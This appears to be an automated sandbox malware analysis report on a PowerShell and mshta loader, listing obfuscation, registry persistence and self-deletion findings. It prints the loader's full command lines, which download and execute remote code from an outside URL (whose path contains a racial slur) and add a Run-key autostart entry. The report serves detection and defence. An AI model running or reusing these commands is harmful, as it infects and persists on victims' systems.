Source:	Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2382164781.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2384235325.0000000005970000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fontdrvhost.exe, 00000010.00000003.2384894357.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385208368.0000000005920000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2388490985.0000000005780000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 00000010.00000003.2386308129.00000000058A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000010.00000003.2385925161.0000000005780000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, jM6m4u9DWikmOWShtE6.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{.KQAAAA_003D_003D(typeof(IntPtr).TypeHandle),.KQAAAA_003D_003D(typeof(Type).TypeHandle)})

Suspicious powershell command line found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) \| . iex;Start-Sleep -Seconds 3;

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C684 push eax; iretd	5_2_05C7C685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C68C push cs; retf 0000h	5_2_05C7C705
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C740 push ds; retf	5_2_05C7C741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C74C push esi; retf	5_2_05C7C74D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C679 pushad ; iretd	5_2_05C7C681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C714 push eax; retf 0000h	5_2_05C7C715
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05C7C73C push es; retf	5_2_05C7C73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA3FD2 push edi; iretd	5_2_05CA42D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA49D1 push es; iretd	5_2_05CA4D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CAABFC push esp; iretd	5_2_05CAABFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA4FF5 push edx; iretd	5_2_05CA4FF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CAB886 push cs; retf	5_2_05CAB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05E081BB push ecx; retf	5_2_05E082F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA7797 push ebx; retf	5_2_05CA779E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA435F push cs; retf	5_2_05CA43A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA5760 push edi; ret	5_2_05CA5761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CAA377 pushad ; retf	5_2_05CAA378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA990A push ecx; retf	5_2_05CA9916
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_05CA7503 push edx; ret	5_2_05CA7504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_04FF58A5 push 0000002Eh; iretd	6_2_04FF58A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_04FF306A push esi; iretd	6_2_04FF30BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_05C95507 push esp; retf	6_2_05C95509
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 16_3_00F720EA push esi; iretd	16_3_00F7213A
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 16_3_00F74925 push 0000002Eh; iretd	16_3_00F74928
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 17_3_00F720EA push esi; iretd	17_3_00F7213A
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 17_3_00F74925 push 0000002Eh; iretd	17_3_00F74928

Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, jM6m4u9DWikmOWShtE6.cs	High entropy of concatenated method names: 'S3lt65JOvAkgKQapRSR', 'mmUvE7J1mQoaNh2BJSU', 'LwwkAaysJm', 'bTBIO3JUyMl7KCmcxpW', 'JqG3rIJcxVXkM4J8FBQ', 'kaClBWJynQ24gIiTOE7', 'r4kTF1J0Wc4GRP0nB0b', 'ggwrAkJSIejCKDgJDbO', 'kYRerNJxFOW0qWgSKxg', 'oUdyyxJ2TX4flUBHGQA'
Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, B.cs	High entropy of concatenated method names: 'Main', 'PwoYlYevI', 'KimKarden', 'YV3DtKLh0', 'n5NUogKIH', 'nH7cxHWuZ', 'JrFye4Irj', 'DHA0GCrVK', 'dmGSSOMv3', 'NtGetContextThread'
Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, REGVHS9OeVXhsthj40r.cs	High entropy of concatenated method names: 'sIxKUwyJ2b', 'cGVMb4J8GfKVjTDSFhd', 'DwLdf3J9XExHHVe5TMY', 'QlcG81dBngQ5kD7jVdS', 'VXby9udzv3508LcC2xe', 'xmxCRJJkZoakVLTtHmM', 'vEyseRJRIv8wphecIgO', 'qBaMW4JdDfGnow0aa8i', 'NrsPVmJJVdEjmww5iB3'

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-126

Jump to behavior

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-126			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatil-119			Jump to behavior

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-126 mshta "javascript:epd=['RUN', 'powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://hot7jan.blogspot.com///////nigger.pdf) | . iex;Start-Sleep -Seconds 3;', 'WScript.Shell', 'Scripting.FileSystemObject']; new ActiveXObject(epd[2])[epd[0]](epd[1], 0, true);close();ncj=new ActiveXObject('Scripting.FileSystemObject');ncj.DeleteFile(WScript.ScriptFullName);"

Jump to behavior

Creates multiple autostart registry keys

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-126			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatil-119			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-126	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-126	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatil-119	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatil-119	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: c:\users\user\desktop\atomxml.ps1

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
